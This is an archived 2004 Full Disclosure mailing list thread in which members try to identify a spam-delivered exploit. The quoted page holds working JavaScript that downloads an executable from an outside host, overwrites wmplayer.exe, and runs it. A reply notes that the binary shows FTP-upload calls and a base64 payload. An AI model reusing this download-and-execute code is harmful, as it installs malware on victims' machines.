Full Disclosure mailing list archives
Re: Old Hack?
From: "VeNoMouS" <venom () gen-x co nz>
Date: Tue, 3 Feb 2004 17:22:14 +1300
if you look at the symbols from that exe, they are look dodge. RegQueryValueExA ShellExecuteA 4FtpPutFileA also appears to have a base64 payload inside it. and i only used strings for that its to hot to do any real work .. ----- Original Message ----- From: "axid3j1al axid3j1al" <axid3j1al () hotmail com> To: <full-disclosure () lists netsys com> Sent: Tuesday, February 03, 2004 4:40 PM Subject: [Full-disclosure] Old Hack?
Has anyone see this little code injection hack. Is this old? Email has subject line "congranulations! you won $1169" with body http://sinaraevent.com/bbs/zipcode/6.htm and code <textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); </script> braindwish has expired _________________________________________________________________ Hot chart ringtones and polyphonics. Go to http://ninemsn.com.au/mobilemania/default.asp _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Old Hack? axid3j1al axid3j1al (Feb 02)
- Re: Old Hack? VeNoMouS (Feb 02)
- Re: Old Hack? Steffen Kluge (Feb 02)
- Re: Old Hack? Nick FitzGerald (Feb 03)
- Re: Old Hack? VeNoMouS (Feb 02)
- <Possible follow-ups>
- Old Hack? Feher Tamas (Feb 03)
- Re: Old Hack? Papp Geza (Feb 03)